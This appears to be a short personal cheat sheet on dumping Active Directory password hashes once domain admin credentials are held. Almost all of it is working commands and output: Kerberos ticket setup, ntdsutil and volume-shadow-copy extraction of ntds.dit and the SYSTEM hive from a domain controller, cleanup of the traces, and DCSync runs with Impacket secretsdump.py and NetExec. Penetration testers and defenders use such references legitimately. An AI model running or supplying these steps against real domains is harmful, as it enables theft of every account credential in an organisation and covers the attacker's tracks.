Dumping Active Directory Hashes

These are some scribbles if I ever need to look up how to dump AD hashes (in various ways). I might expand on this later…

ℹ️	This is nothing new, most of this stuff can be easily found on the Internet. This is just for my own reference. Please excuse my brevity.

This posts strictly limits itself to post-exploitation, after already having obtained DA credentials.

Dumping

Requesting a Kerberos ticket first:

$ getTGT.py -dc-ip dc01.mshome.net corp.local/administrator
$ export KRB5CCNAME=administrator.ccache
$ klist

Manually, using ntdsutil:

$ getTGT.py -dc-ip dc01.mshome.net corp.local/administrator
$ export KRB5CCNAME=administrator.ccache
$ klist
$ ewp -i dc01.corp.local -k
PS C:\> ntdsutil "ac i ntds" "ifm" "create full c:\extract" quit quit
PS C:\> download "C:\extract\Active Directory\ntds.dit" .
PS C:\> download "C:\extract\registry\SYSTEM" .
PS C:\> rm C:\extract -r -force
C:\> exit

Manually, using VSS:

$ ewp -i dc01.corp.local -k
# In case `ntds.dit` is stored somewhere else, lookup its location, and create another shadow copy if stored on a separate volume:
PS C:\> reg query "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "DSA Database file"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
    DSA Database file    REG_SZ    C:\Windows\NTDS\ntds.dit

PS C:\> vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {bec8207d-b03e-4e77-a956-129dbda52993}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
PS C:\> cmd /c mklink /d C:\extract \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
PS C:\> download "C:\extract\windows\system32\config\SYSTEM" .
PS C:\> download "C:\extract\Windows\NTDS\ntds.dit" .
PS C:\> rm C:\extract
PS C:\> cmd /c vssadmin Delete Shadows /Shadow={bec8207d-b03e-4e77-a956-129dbda52993} /quiet
PS C:\> exit

Using Impacket’s secretsdump.py, either via DRSUAPI (default), or VSS (using option):

$ secretsdump.py dc01.local.corp -k -no-pass -outputfile 'dcsync' [-use-vss] [-history]

Using NetExec, either via DRSUAPI (default), or VSS (using option):

$ nxc smb --use-kcache dc01.corp.local --kdcHost dc01.corp.local --ntds [vss] [--history] [-M ntdsutil]

Also support dumping via ntdsutil, instead of a DCSync:

$ nxc smb --use-kcache dc01.corp.local --kdcHost dc01.corp.local -M ntdsutil

Dumping#

Comments

Dumping